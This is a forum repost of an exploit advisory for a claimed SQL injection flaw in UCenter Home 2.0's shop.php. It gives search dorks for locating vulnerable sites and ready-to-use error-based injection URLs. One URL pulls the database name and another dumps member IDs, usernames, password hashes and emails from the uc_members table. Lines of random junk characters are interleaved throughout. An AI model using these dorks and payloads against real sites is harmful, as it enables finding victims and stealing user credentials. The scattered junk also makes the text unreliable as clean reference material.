中国网络渗透测试联盟
标题:
UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability
[打印本页]
作者:
admin
时间:
2013-2-27 21:31
标题:
UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability
0 a h; z5 T0 L! M8 I3 e# u5 Y4 o
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
, u! J( E) V- M' E) i, F
, A$ ^5 K' G. l3 p( v" I; ]2 m) j
! G! w& n) X( T" l8 S* p
3 T2 J Z! L# p
*/ Author : KnocKout
, W# l# `' I* r/ T) _ h
5 a; r0 o9 q) r5 X+ H
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
# N, h# g8 n% c
! k# c ?# p% Z2 g+ J8 i- |1 K" p
*/ Contact:
knockoutr@msn.com
/ T. _- ~ Z0 w- C
. s" ~, d6 i& x5 b; P8 O
*/ Cyber-Warrior.org/CWKnocKout
! p' q3 N2 ?/ B. O0 a& n- y$ t
+ l. `- C W7 f$ e$ [5 `
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
1 o$ J- a/ P0 A
" h' s" f) S% b. p' V
Script : UCenter Home
7 o7 Q/ J. ^' S5 R
) K1 l/ d- e' ~3 X- z; H4 g
Version : 2.0
, }: h, c7 |* I. V) X# S
9 H( F+ g! e% ] j
Script HomePage :
http://u.discuz.net/
8 P8 ?7 R8 x! z
1 L0 W/ I6 G! y+ @( Z: _3 ?' x
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
* N; a& G/ L9 R" y2 v5 b0 l
1 T8 T) Q: |. R" V( q2 Q
Dork : Powered by UCenter inurl:shop.php?ac=view
. y5 t/ z* I) y7 h2 Q
|. n' W2 I) P5 D
Dork 2 : inurl:shop.php?ac=view&shopid=
& i# `' r5 n: B
0 a" {/ C' N/ H6 m4 l
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
- X3 z0 p( `: [" k% [3 |; m( S0 `
. q5 H. o u0 u# G. F4 o% n
Vuln file : Shop.php
$ j% e C( q/ v7 I9 u+ l0 B
+ A8 e/ q/ ]8 W, t& B
value's : (?)ac=view&shopid=
# Q2 O l# p1 X X/ f! J
4 x" L* J( C& r' R
Vulnerable Style : SQL Injection (MySQL Error Based)
\; b. h4 Y5 v; }
5 k" `( Z" \9 b3 P
Need Metarials : Hex Conversion
6 H* o6 K! @( r
/ t' r' V, s9 _7 U- U U6 q
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
3 c; E; B% Y7 U9 Q6 h
) U( x; S+ }. `! e$ P% P3 H5 A
Your Need victim Database name.
/ Z4 K- q- U7 X, P e
# }7 m% x$ U1 g6 D6 B+ x
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
% F5 J6 j. }9 u U4 L: h& |# Y9 }' W
2 F! W% f/ h; [0 C- P- u7 ]* B
..
% h$ [7 C2 f. N; l* X
' ]( c) @/ \ p7 o. i: T3 h
DB : Okey.
. o4 R5 |0 `& B
1 e8 ^9 Q! _* [* H% F, j
your edit DB `[TARGET DB NAME]`
; b& C* e# q8 B6 w7 r
" n1 B, Q0 K# L
Example : 'hiwir1_ucenter'
" u# Y+ t/ R, [; ^3 l2 {
8 E% D4 a4 p5 f8 E
Edit : Okey.
7 ^/ i: {2 B4 U% }+ a' H
! ?2 O: S; D5 p: K! c
Your use Hex conversion. And edit Your SQL Injection Exploit..
5 `! D$ O3 t( ]6 Q C; o
8 S+ c$ s6 p, E* ~
' X' s* z8 h- F, O- _& y
$ Z9 y3 u* o2 d8 {& n
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
4 b: Z! K2 Z) e+ \+ G1 S* ~
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2